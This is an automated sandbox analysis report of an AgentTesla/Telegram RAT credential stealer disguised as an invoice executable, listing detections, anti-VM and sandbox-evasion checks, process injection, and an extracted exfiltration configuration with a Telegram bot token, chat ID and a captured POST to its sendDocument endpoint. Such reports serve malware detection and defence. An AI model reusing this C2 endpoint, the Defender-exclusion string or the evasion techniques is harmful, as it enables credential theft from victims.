
Windows Analysis Report: Invoice_PDF.exe

Overview

General Information

Sample Name: Invoice_PDF.exe
Analysis ID: 532735
MD5: 1dcc43f272f66d8e5afe11e7276dd122
SHA1: cb6a88d1443e7cca944a4176e2a8ebc205f715e3
SHA256: 0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign process
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file name is different from the original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Invoice_PDF.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\Invoice_PDF.exe" MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
    • Invoice_PDF.exe (PID: 5944 cmdline: C:\Users\user\Desktop\Invoice_PDF.exe MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 17 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.0.Invoice_PDF.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
3.0.Invoice_PDF.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
3.2.Invoice_PDF.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
3.2.Invoice_PDF.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
3.0.Invoice_PDF.exe.400000.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 16 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 3.0.Invoice_PDF.exe.400000.12.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
Source: Invoice_PDF.exe.5944.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Invoice_PDF.exe | Virustotal: Detection: 45%
Source: Invoice_PDF.exe | Metadefender: Detection: 48%
Source: Invoice_PDF.exe | ReversingLabs: Detection: 62%
Antivirus / Scanner detection for submitted sample
Source: Invoice_PDF.exe | Avira: detected
Source: 3.0.Invoice_PDF.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.2.Invoice_PDF.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: Invoice_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: Invoice_PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 4x nop then jmp 09220F57h

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d Host: api.telegram.org Content-Length: 1009 Expect: 100-continue Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://PHCGWf.com
Source: Invoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: Invoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmp | String found in binary or memory: https://87HMfkdDwCo1wEm.org
Source: Invoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmp | String found in binary or memory: https://87HMfkdDwCo1wEm.orgx
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org4
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | HTTP traffic detected: POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d Host: api.telegram.org Content-Length: 1009 Expect: 100-continue Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Invoice_PDF.exe
.NET source code contains very large array initializations
Source: 3.0.Invoice_PDF.exe.400000.12.unpack, <PrivateImplementationDetails>{5029162B-2D4E-489B-8212-1A5255E1EA59}/4695CF78-3B59-4037-B8EE-F86771E06890.cs | Large array initialization: .cctor: array initializer size 12005
Source: Invoice_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Invoice_PDF.exe | Binary or memory string: OriginalFilename vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTransactionalFileManager.dllf# vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.282580770.0000000009150000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000003.00000002.521181081.00000000012F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
Source: Invoice_PDF.exe | Binary or memory string: OriginalFilenameOverlappedDa.exeB vs Invoice_PDF.exe
Source: Invoice_PDF.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Invoice_PDF.exe | Virustotal: Detection: 45%
Source: Invoice_PDF.exe | Metadefender: Detection: 48%
Source: Invoice_PDF.exe | ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Invoice_PDF.exe "C:\Users\user\Desktop\Invoice_PDF.exe"
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Process created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: 3.0.Invoice_PDF.exe.400000.12.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Invoice_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Invoice_PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
Source: Invoice_PDF.exe, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Invoice_PDF.exe.ed0000.11.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Invoice_PDF.exe.ed0000.5.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Invoice_PDF.exe.ed0000.13.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Invoice_PDF.exe.ed0000.9.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Invoice_PDF.exe.ed0000.7.unpack, ObjectHolderList/ObjectHolderListGame.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_00B972C2 push esi; iretd 0_2_00B972C9
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_00B95076 push bx; ret 0_2_00B9507D
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_02E28748 push 8802EC9Eh; iretd 0_2_02E2874D
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_02E21C67 push ebx; iretd 0_2_02E21C7A
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_02E21C7C push ebx; iretd 0_2_02E21C7A
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_09143267 pushad ; ret 0_2_0914326D
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 0_2_0922422D push FFFFFF8Bh; iretd 0_2_0922422F
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 3_2_00ED72C2 push esi; iretd 3_2_00ED72C9
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 3_2_00ED5076 push bx; ret 3_2_00ED507D
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 3_2_013997B0 pushad ; ret 3_2_013997B1
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 3_2_01769460 push ss; retf 3_2_01769477
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 3_2_017ECF71 push esp; iretd 3_2_017ECF7D
Source: initial sample Static PE information: section name: .text entropy: 7.91118342624
Source: C:\Users\user\Desktop\Invoice_PDF.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Invoice_PDF.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.Invoice_PDF.exe.304a634.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Invoice_PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Invoice_PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 5136 Thread sleep time: -35736s >= -30000s
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 2564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6460 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464 Thread sleep count: 1903 > 30
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464 Thread sleep count: 7944 > 30
Source: C:\Users\user\Desktop\Invoice_PDF.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Invoice_PDF.exe Window / User API: threadDelayed 1903
Source: C:\Users\user\Desktop\Invoice_PDF.exe Window / User API: threadDelayed 7944
Source: C:\Users\user\Desktop\Invoice_PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Thread delayed: delay time: 35736
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp Binary or memory string: vmware
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Invoice_PDF.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Invoice_PDF.exe Code function: 3_2_01399DF0 LdrInitializeThunk,3_2_01399DF0
Source: C:\Users\user\Desktop\Invoice_PDF.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Invoice_PDF.exe Memory written: C:\Users\user\Desktop\Invoice_PDF.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Invoice_PDF.exe Process created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
